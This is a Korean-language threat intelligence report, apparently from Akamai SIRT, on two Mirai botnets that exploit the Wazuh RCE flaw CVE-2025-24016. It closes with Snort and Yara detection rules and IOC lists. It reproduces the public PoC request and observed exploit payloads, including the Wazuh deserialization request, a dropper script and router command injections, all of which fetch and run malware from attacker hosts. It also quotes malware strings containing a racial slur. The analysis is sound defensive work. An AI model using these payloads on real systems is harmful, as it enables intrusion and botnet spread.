두 개의 봇넷, 하나의 취약점: Wazuh 취약점을 통해 확산되는 Mirai
이 리서치에서 수집된 모든 결과는 SIRT 허니팟을 통해 수집되었으며, Wazuh 소프트웨어를 실행 중인 실제 Wazuh 프로덕션 엔드포인트에서는 관찰되지 않았습니다.
콘텐츠 경고: 이 글에서 언급된 공격자가 사용한 일부 명명 규칙에는 인종 차별적 표현과 노골적인 언어가 포함되어 있습니다. 교육 및 발견 목적으로 해당 표현을 편집하지 않았습니다. 해당 표현은 Akamai의 가치관이나 견해를 반영하지 않습니다.
핵심 요약
Akamai SIRT(Security Intelligence and Response Team)는 Wazuh 서버(CVSS 9.9)를 대상으로 한 중대한 RCE(Remote Code Execution) 취약점 CVE-2025-24016을 악용한 공격을 확인했습니다.
공격자는 이 취약점으로 DAPI(Decentralized API) 요청을 악용해 검증되지 않은 딕셔너리 파일을 업로드해 원격으로 코드를 실행할 수 있습니다.
Akamai는 이 취약점을 악용하는 Mirai 변종 두 개의 캠페인을 관찰했습니다. 그중 하나인 "Resbot"은 도메인에 이탈리아어 명명 규칙을 포함하고 있어, 영향을 받은 디바이스 소유자의 표적 지역이나 언어와 관련이 있을 수 있습니다.
Akamai SIRT는 2025년 3월에 글로벌 허니팟 네트워크에서 해당 취약점의 활동을 처음 확인했습니다. 이것은 취약점의 최초 공개(2025년 2월) 이후 첫 번째 활성 악용 사례입니다.
취약점을 악용하는 봇넷은 CVE-2023-1389, CVE-2017-17215, CVE-2017-18368 등 알려진 여러 취약점을 활용했습니다.
이번 블로그 게시물의 끝에는 이 위협에 대한 방어에 도움이 될 수 있는 IOC(Indicators Of Compromise ) 목록이 포함되어 있습니다.
서론
Akamai SIRT는 2025년 3월 말에 인터넷에 노출된 허니팟 클러스터에서 CVE-2025-24016을 이용한 공격 시도를 감지했습니다. 조사 결과, 두 개의 서로 다른 봇넷이 이 취약점을 악용해 Mirai 멀웨어 변종을 취약한 표적 시스템에 확산시키고 있었습니다.
CVE-2025-24016이란 무엇일까요?
2025년 2월, CVE-2025-24016이 오픈 소스 XDR 및 SIEM 솔루션 Wazuh의 관리자 패키지에서 공개되었습니다. 이 취약점은 Wazuh 버전 4.4.0부터 4.9.0까지에 영향을 미치며, 버전 4.9.1에서 패치가 출시되었습니다. 원격 공격자는 이 취약점을 이용하면 API 접속 권한을 통해 악의적으로 조작된 JSON 파일을 사용해 표적 서버에서 임의의 코드를 실행할 수 있습니다.
Wazuh API에서 DistributedAPI의 매개변수는 JSON으로 직렬화되며, framework/wazuh/core/cluster/common.py 파일에서 as_Wazuh_object를 사용해 역직렬화됩니다. DAPI 요청에 검증되지 않은 딕셔너리를 주입해 이 취약점을 악용함으로써 임의의 Python 코드를 실행할 수 있습니다.
2025년 2월 말, PoC(Proof of Concept)에서 이 취약점을 통해 RCE를 달성하는 방법을 상세히 설명했습니다. RCE는 run_as 엔드포인트를 사용해 트리거될 수 있으며 공격자는 auth_context 인수를 제어할 수 있습니다. PoC에서 저자는 Burp Suite 요청을 사용해 URI /security/user/authenticate/run_as에 대한 공격을 시연했습니다(그림 1).
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-
encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}
그림 1: Burp Suite 요청 (출처: https://github.com/MuhammadWaseem29/CVE-2025-24016))
인증 헤더는 Base64로 인코딩되어 있으며 악성 페이로드에는 검증되지 않은 예외 __unhandled_exc__가 포함되어 있어 임의의 Python 코드 실행을 유발하며 이 경우 exit입니다.
실제 악용
공개 후 몇 주 만에, 2025년 3월 초에 Akamai SIRT는 글로벌 허니팟 네트워크에서 이 Wazuh 취약점을 악용하려는 시도를 발견했습니다. 이는 봇넷 운영자가 신규 공개된 CVE에 대해 도입한 악용까지 소요 시간이 지속적으로 단축되는 최신 사례입니다.
Base64 인코딩된 헤더 권한은 wazuh-wui:MyS3cr37P450r.*-로 해독되며, 이는 PoC 악용의 권한과 동일합니다(그림 2). 엔드포인트와 요청 구조는 PoC 악용과 일치하지만 여기서는 멀웨어를 확산시키는 데 사용되었습니다.
/security/user/authenticate/run_as {"__unhandled_exc__":{"__args__":["wget http://176.65.134[.]62/w.sh -O /tmp/temp_script.sh || curl -o /tmp/temp_script.sh http://176.65.134[.]62/w.sh; sh /tmp/temp_script.sh"],"__class__":"os.system"}}
Header Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
그림 2: 악용 시도 #1은 PoC와 동일합니다
또한 2025년 5월 초에 이 취약점의 표준 표적 엔드포인트와 다른 엔드포인트 /Wazuh를 표적으로 한 유사한 구조의 요청을 탐지했습니다(그림 3). 요청은 엔드포인트를 제외하고 PoC와 거의 동일하므로 봇넷이 여전히 동일한 Wazuh 취약점을 악용하려고 시도하고 있을 가능성이 높습니다.
/wazuh {"__unhandled_exc__": {"__class__": "os.system", "__args__": ["wget http://104.168.101[.]27/sh -O- | sh"]}}
Header Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
그림 3: 악용 시도 #2는 PoC와 다릅니다
봇넷 1: 여러 Mirai 변종
Akamai의 관찰 결과, Wazuh 취약점의 활성 공격은 두 개의 서로 다른 봇넷과 연결되어 있습니다. 첫 번째 봇넷은 2025년 3월 초의 첫 번째 시도와 연결되어 있으며, 악용이 주요 Mirai 멀웨어 페이로드를 다운로드하는 악성 쉘 스크립트를 다운로드하고 실행합니다(그림 4). Mirai와 함께 자주 보이는 평균적인 쉘 스크립트와 유사하게 다양한 아키텍처를 지원해 주로 IoT(Internet of Things) 디바이스를 표적으로 삼습니다.
"busybox wget http://176.65.134[.]62/bins/morte.arm; chmod 777 morte.arm; ./morte.arm morte.arm",
"busybox wget http://176.65.134[.]62/bins/morte.arm5; chmod 777 morte.arm5; ./morte.arm5 morte.arm5",
"busybox wget http://176.65.134[.]62/bins/morte.arm6; chmod 777 morte.arm6; ./morte.arm6 morte.arm6",
"busybox wget http://176.65.134[.]62/bins/morte.arm7; chmod 777 morte.arm7; ./morte.arm7 morte.arm7",
"busybox wget http://176.65.134[.]62/bins/morte.i686; chmod 777 morte.i686; ./morte.i686 morte.i686",
"busybox wget http://176.65.134[.]62/bins/morte.m68k; chmod 777 morte.m68k; ./morte.m68k morte.m68k",
"busybox wget http://176.65.134[.]62/bins/morte.mips; chmod 777 morte.mips; ./morte.mips morte.mips",
"busybox wget http://176.65.134[.]62/bins/morte.mpsl; chmod 777 morte.mpsl; ./morte.mpsl morte.mpsl",
"busybox wget http://176.65.134[.]62/bins/morte.ppc; chmod 777 morte.ppc; ./morte.ppc morte.ppc",
"busybox wget http://176.65.134[.]62/bins/morte.sh4; chmod 777 morte.sh4; ./morte.sh4 morte.sh4",
"busybox wget http://176.65.134[.]62/bins/morte.spc; chmod 777 morte.spc; ./morte.spc morte.spc",
"busybox wget http://176.65.134[.]62/bins/morte.x86; chmod 777 morte.x86; ./morte.x86 morte.x86",
"busybox wget http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x64",
"rm $0"
그림 4: w.sh 쉘 스크립트의 내용
Mirai 멀웨어 샘플인 "morte"는 LZRD Mirai 변종으로 추정되며 이미 오래 전부터 존재해 왔습니다. 실행 시 표적 머신의 콘솔에 출력하는 하드코딩된 고유 문자열 "lzrd here"로 쉽게 구분할 수 있습니다.
관찰된 관련 도메인
IP 주소 176.65.134[.]62를 조사한 결과, nuklearcnc.duckdns[.]org라는 C2(Command and Control) 도메인으로 확인되었습니다. Duck DNS는 동적 DNS 서버이며, 여기서는 이 특정 서브도메인만 악성입니다.
이 도메인은 동일한 시간대에 176.65.142.252로도 해결되었습니다. 해당 IP는 cbot.galaxias[.]cc라는 다른 C2 도메인으로 연결되었습니다. VirusTotal을 통해 Windows 기반 RAT로 추정되는 멀웨어가 발견할 수 있었으며 이 멀웨어는 Windows svchost 프로세스로 위장해 cbot.galaxias[.]cc 서브도메인으로 C2 통신을 수행합니다.
또 다른 서브도메인 neon.galaxias[.]cc에는 표준 Mirai 변종의 배포와 그와 관련된 통신이 관찰되었습니다. 이 도메인의 IP 주소 중 하나인 209.141.34[.]106은 두 개의 다른 C2 도메인인 pangacnc[.]com과 jimmyudp-raw[.]xyz로도 연결되었습니다.
jimmyudp-raw[.]xyz 도메인에는 VirusTotal에 등록된 세 가지 다른 이름의 Mirai 멀웨어 샘플이 있었습니다. 첫 번째 샘플인 "neon"은 미확인 Mirai 변종으로, C2 통신을 위해 포트 80을 통해 65.222.202[.]53에 연결되었으며, 하드코딩된 콘솔 문자열 "fuck u nigga"를 포함하고 있었습니다.
두 번째 샘플인 "k03ldc"는 V3G4 Mirai 변종의 수정 또는 업그레이드된 버전으로 보입니다. "666V3G4-Katana999"라는 하드코딩된 콘솔 문자열을 포함하며 C2 통신을 위해 포트 36063을 통해 196.251.86[.]49로 연결되었습니다.
마지막으로 세 번째 샘플인 "KKveTTgaAAsecNNaaaa"는 오리지널 V3G4 Mirai 변종입니다. 이 멀웨어는 C2 통신을 위해 포트 60195를 통해 209.141.34[.]106에 연결되며, 감염 시 하드코딩된 문자열 "xXxSlicexXxxVEGA"를 사용합니다. 이 멀웨어는 표적 머신이 V3G4 변종에 이미 감염되었는지 확인하며, 감염된 경우 일반적인 출력 대신 "We got this shit already"를 출력합니다.
pangacnc[.]com 도메인에는 VirusTotal에 두 개의 서로 다른 이름의 Mirai 멀웨어 샘플이 있었습니다. 하나는 "KKveTTgaAAsecNNaaaa"라는 이름의 멀웨어로 이전에 언급된 것과 동일합니다. 또 다른 하나는 "vision"이라는 이름의 LZRD Mirai 변종으로 다른 C2 도메인의 "neon" 샘플과 마찬가지로 포트 80을 통해 65.222.202[.]53에 연결됩니다. 이는 "neon"이라는 이름의 Mirai 멀웨어가 LZRD 변종의 수정된 버전일 수 있음을 시사합니다.
추가적으로 악용된 취약점
Akamai는 Wazuh RCE를 표적으로 삼는 것 외에도 해당 봇넷이 다양한 알려진 취약점을 악용하려는 시도를 관찰했습니다. 여기에는 Akamai가 악용을 관찰해 이전 블로그 게시물에서 문서화한 여러 취약점이 포함됩니다(그림 5, 그림 6, 그림 7).
/ws/v1/cluster/apps {"application-id": "application_1404198295326_0003", "application-name": "get-shell", "am-container-spec": {"commands": {"command": "wget http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x86_64; rm -rf morte.x64; curl -O http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x86_64; rm -rf morte.x64"}}, "application-
그림 5: Hadoop YARN 취약점
/cgi-bin/luci/;stok=/locale?form=country operation=write&country=$(id>cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://176.65.134[.]62/update.sh; curl -O http://176.65.134[.]62/update.sh; chmod 777 update.sh; sh update.sh; tftp 176.65.134[.]62 -c get tupdate.sh; chmod 777 tupdate.sh; sh tupdate.sh; tftp -r tupdate2.sh -g 176.65.134[.]62; chmod 777 tupdate2.sh; sh tupdate2.sh; ftpget -v -u anonymous -p anonymous -P 21 176.65.134[.]62 update1.sh update1.sh; sh update1.sh; rm -rf update.sh tupdate
그림 6: TP-Link Archer AX21 명령어 주입 (참조: https://nvd.nist.gov/vuln/detail/cve-2023-1389)
/manager_dev_ping_t.gch cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.34[.]106/1.sh; curl -O http://209.141.34[.]106/1.sh; chmod 777 1.sh; sh 1.sh; tftp 209.141.34[.]106 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 209.141.34[.]106; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.34[.]106 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3
그림 7: ZTE ZXV10 H108L 라우터 RCE 악용(참조: https://github.com/stasinopoulos/ZTExploit/blob/master/ZTExploit_Source/ztexploit.py)
봇넷 2: Resbot/Resentual 봇넷
2025년 5월 초 /Wazuh 엔드포인트에 대한 공격 시도에서 발견된 두 번째 봇넷입니다. 첫 번째 악용과 유사하게, 이 봇넷도 악성 쉘 스크립트를 다운로드하고 실행해 Mirai 다운로더로 작동합니다. 이 멀웨어는 하드코딩된 콘솔 문자열 "Resentual got you!"를 통해 "resgod"로 식별됩니다. 첫 번째 봇넷과 마찬가지로, 페이로드도 IoT 디바이스를 표적으로 하는 다양한 아키텍처를 타겟으로 합니다.
이 봇넷에서 주목할 만한 점 중 하나는 관련된 언어입니다. 이 봇넷은 이탈리아어 명명 규칙을 가진 다양한 도메인을 사용해 멀웨어를 확산시켰습니다. 예를 들어 "gestisciweb.com" 도메인은 "웹 관리"로 대략 번역됩니다.
이 도메인들은 피싱 공격에 자주 사용되는 악성 도메인 이름과 유사하며, C2 "resbot.online"(명백히 악성 도메인)보다 훨씬 더 정상적으로 보입니다. 언어적 명명 규칙은 이탈리아어를 사용하는 사용자가 소유하고 운영하는 디바이스를 표적으로 삼은 캠페인을 나타낼 수 있습니다.
샘플에 포함된 문자열은 암호화되지 않은 상태로 다양한 추가 스캔 기능과 악용을 보여줍니다. 104.168.101[.]27 IP 주소는 멀웨어에 하드코딩되어 있으며 TCP 포트 62627(가능한 C2 포트 중 하나)을 통해 C2 서버로 사용됩니다. 또한 이 봇넷이 포트 21을 통해 FTP로 확산을 시도하고 텔넷 스캔을 수행하는 것을 확인했습니다.
다양한 하드코딩된 악용은 그림 8, 그림 9, 그림 10, 그림 11에 표시되어 있습니다.
POST /ctrlt/DeviceUpgrade_1 HTT
P/1.1\r\nContent-Length: 440\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthori
zation: Digest username="dslf-config", realm="HuaweiHomeGateway",
nonce="88645ce
fb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1",
response="3612f843a42d
b38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001,
cnonce="248d1a2
560100669"\r\n\r\n<?xml version="1.0" ?><s:Envelope
xmlns:s="http://schemas.xmls
oap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encodin
g/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-
org:service:WANPPPConnection:1"
><NewStatusURL>$(/bin/busybox wget -g 104.168.101[.]27 -l /tmp/.kx -r
/resgod.mips
; /bin/busybox chmod +x /tmp/.kx; /tmp/.kx selfrep.huawei)</NewStatusURL>.
<NewDow
nloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade>.
</s:Body></s:Envelope>\r
\n\r\n\r\n
그림 8: Huawei HG532 라우터 RCE(참조: https://nvd.nist.gov/vuln/detail/cve-2017-17215)
POST /picsdesc.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding//%22%3E<s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://104.168.101[.]27/resgod.mips; chmod 777 resgod.mips; ./resgod.mips selfrep.realtek</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n
그림 9: Realtek SDK Miniigd UPnP SOAP RCE(참조: https://www.google.com/url?q=https://nvd.nist.gov/vuln/detail/cve-2014-8361&sa=D&source=docs&ust=1748461205172738&usg=AOvVaw2FtzN61mQxXkxEWnb9gb05)
POST /cgi-bin/ViewLog.asp HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 176\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://104.168.101[.]27/resgod.arm7;chmod+777+resgodarm7;./resgodarm7;rm+-rf+resgod.arm7%3b%23&remoteSubmit=Save\r\n\r\n
그림 10: TrueOnline ZyXEL P660HN-T v1 라우터 명령어 주입(참조: https://nvd.nist.gov/vuln/detail/cve-2017-18368)
&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=$(echo -e "wget http://104.168.101[.]27/sh" >> /tmp/.res) HTTP/1.0
그림 11: FTP를 통한 확산
결론
오래된 소스 코드를 재사용하거나 재활용해 새로운 봇넷을 설정하거나 생성하는 것이 비교적 간단하기 때문에 Mirai의 확산은 여전히 계속되고 있습니다. 또한 봇넷 운영자는 새롭게 공개된 악용을 활용하는 것만으로도 성공을 거둘 수 있습니다.
CVE 프로그램은 전반적으로 업계에 긍정적인 영향을 미치지만 공격자가 간과했을 수 있는 취약점을 드러내며 양날의 검이 될 수 있습니다.
연구원이 취약점의 중요성을 기업에 교육하기 위해 PoC를 제작하는 시도는 계속해서 부정적인 결과를 초래하며 패치가 출시될 때 이를 따라잡는 것이 얼마나 중요한지 보여줍니다. 봇넷 운영자는 이러한 취약점 공개를 주시하며, 특히 PoC가 공개된 경우 해당 코드를 빠르게 수정해 봇넷을 확산시키는 데 활용합니다.
최근 보고된 다른 취약점과 달리 CVE-2025-24016은 퇴역한 디바이스만이 아닌 최신 버전을 사용하지 않는 활성 Wazuh 서버에 영향을 미칩니다. 최신 패치 버전을 적용하는 것이 강력히 권장됩니다. 이 경우 Wazuh 버전 4.9.1 이상을 적용해야 합니다. Wazuh는 시스템 보안을 강화하는 방법에 대한 가이드를 제공했으며, 이 가이드를 준수한다면 이번 캠페인은 문제가 되지 않을 것입니다.
Akamai와 항상 함께하세요
IOC
보안팀을 돕기 위해 IOC 목록과 Snort 및 Yara 룰을 포함시켰습니다.
네트워크 IOC에 대한 Snort 룰
C2 IP에 대한 Snort 룰(1번 봇넷)
alert ip any any -> [209.141.34.106, 176.65.142.137, 65.222.202.53, 196.251.86.49, 176.65.134.62] any (
msg:"Possible Botnet C2 Infrastructure Activity - Suspicious IP";
sid:2000001;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
C2 도메인 레졸루션 탐지에 대한 Snort 룰(1번 봇넷)
alert http any any -> [nuklearcnc.duckdns.org, jimmyudp-raw.xyz, pangacnc.com, neon.galaxias.cc, cbot.galaxias.cc] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000002; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
C2 IP에 대한 Snort 룰(2번 봇넷)
alert ip any any -> [104.168.101.27, 104.168.101.23, 79.124.40.46, 194.195.90.179] any (
msg:"Possible Botnet C2 Infrastructure Activity - Suspicious IP";
sid:2000003;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
C2 도메인 레졸루션 탐지에 대한 Snort 룰(2번 봇넷)
alert http any any -> [resbot.online, versioneonline.com, web-app-on.com, assicurati-con-linear.online, webdiskwebdisk.webprocediweb.com, continueoraweb.com, ora-0-web.com, adesso-online.com, multi-canale.com, eversioneweb.com, gestisciweb.com] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000004; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
멀웨어 샘플용 Yara 룰(1번 봇넷)
rule Mirai_Malware_IOCs_1
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware"
author = "Akamai SIRT"
date = "2025-05-16"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$lzrd = "LZRD"
$fucku = "fuck u nigga"
$vega = "xXxSlicexXxxVEGA"
$we_got_this = "We got this shit already"
$katana = "666V3G4-Katana999"
$ip1 = "209.141.34.106"
$ip2 = "176.65.142.137"
$ip3 = "65.222.202.53"
$ip4 = "196.251.86.49"
$ip5 = “176.65.134.62”
$domain1 = "nuklearcnc.duckdns.org"
$domain2 = "jimmyudp-raw.xyz"
$domain3 = "pangacnc.com"
$domain4 = "neon.galaxias.cc"
$domain5 = "cbot.galaxias.cc"
$hash1 = "dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9"
$hash2 = "7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549"
$hash3 = "64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f"
$hash4 = "4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed"
$hash5 = "811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc"
$hash6 = "90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353"
$hash7 = "8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6"
$hash8 = "c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1"
$hash9 = "6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a"
condition:
(
$lzrd or
$fucku or
$vega or
$we_got_this or
$katana or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$ip5 or
$domain1 or
$domain2 or
$domain3 or
$domain4 or
$domain5 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6 or
$hash7 or
$hash8 or
$hash9
)
}
멀웨어 샘플용 Yara 룰(2번 봇넷)
rule Mirai_Malware_IOCs_2
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware."
author = "Akamai SIRT"
date = "2025-05-16"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$resentual = "Resentual got you"
$ip1 = "104.168.101.27"
$ip2 = "104.168.101.23"
$ip3 = "79.124.40.46"
$ip4 = "194.195.90.179"
$domain1 = "resbot.online"
$domain2 = "versioneonline.com"
$domain3 = "web-app-on.com"
$domain4 = "Assicurati-con-linear.online"
$domain5 = "webdiskwebdisk.webprocediweb.com"
$domain6 = "continueoraweb.com"
$domain7 = "ora-0-web.com"
$domain8 = "adesso-online.com"
$domain9 = "multi-canale.com"
$domain10 = "eversioneweb.com"
$domain11 = "gestisciweb.com"
$hash1 = "9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b"
$hash2 = "be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0"
$hash3 = "e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0"
$hash4 = "4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6"
$hash5 = "a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc"
$hash6 = "941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549"
condition:
(
$resentual or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$domain1 or
$domain2 or
$domain3 or
$domain4 or
$domain5 or
$domain6 or
$domain7 or
$domain8 or
$domain9 or
$domain10 or
$domain11 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6
)
}
악성 IPv4 주소(1번 봇넷)
209.141.34.106
176.65.142.137
65.222.202.53
196.251.86.49
176.65.134.62
악성 도메인(1번 봇넷)
nuklearcnc.duckdns[.]org
jimmyudp-raw[.]xyz
pangacnc[.]com
neon.galaxias[.]cc
cbot.galaxias[.]cc
악성 IPv4 주소(2번 봇넷)
104.168.101.27
104.168.101.23
79.124.40.46
194.195.90.179
악성 도메인(2번 봇넷)
resbot[.]online
versioneonline[.]com
web-app-on[.]com
Assicurati-con-linear[.]online
webdiskwebdisk.webprocediweb[.]com
continueoraweb[.]com
ora-0-web[.]com
adesso-online[.]com
multi-canale[.]com
eversioneweb[.]com
gestisciweb[.]com
SHA256 해시(1번 봇넷)
dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9
7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549
64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f
4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed
811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc
90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353
8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6
c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1
6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a
SHA256 해시(2번 봇넷)
9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b
be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0
e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0
4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6
a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc
941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549
